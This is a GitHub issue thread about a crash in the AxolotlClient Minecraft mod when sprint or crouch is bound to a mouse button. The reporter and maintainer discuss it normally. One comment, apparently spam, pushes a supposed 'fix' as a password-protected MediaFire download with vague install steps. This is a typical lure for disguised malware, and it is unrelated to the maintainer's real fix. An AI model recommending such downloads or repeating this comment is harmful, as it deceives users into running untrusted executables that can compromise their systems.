### ISSUE TITLE
Crash when binding sprint to a mouse button.

### ISSUE THREAD

**Issue by U2V4eU5hbWVIZXJl** [moehreag/AxolotlClient-branding#131]
My game crashes whenever I bind sprint to my 'Mouse 4' the game closes when I enter any world/server and outputs 
[this](https://github.com/user-attachments/files/16831013/crash-2024-09-01_17.16.17-client.txt).

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by U2V4eU5hbWVIZXJl** [comment]
After further testing, happens when both sprint OR crouch are bound.

**Comment by moehreag** [comment]
I have found a fix, I will leave this issue open until said fix is released though. Thank you for the report!
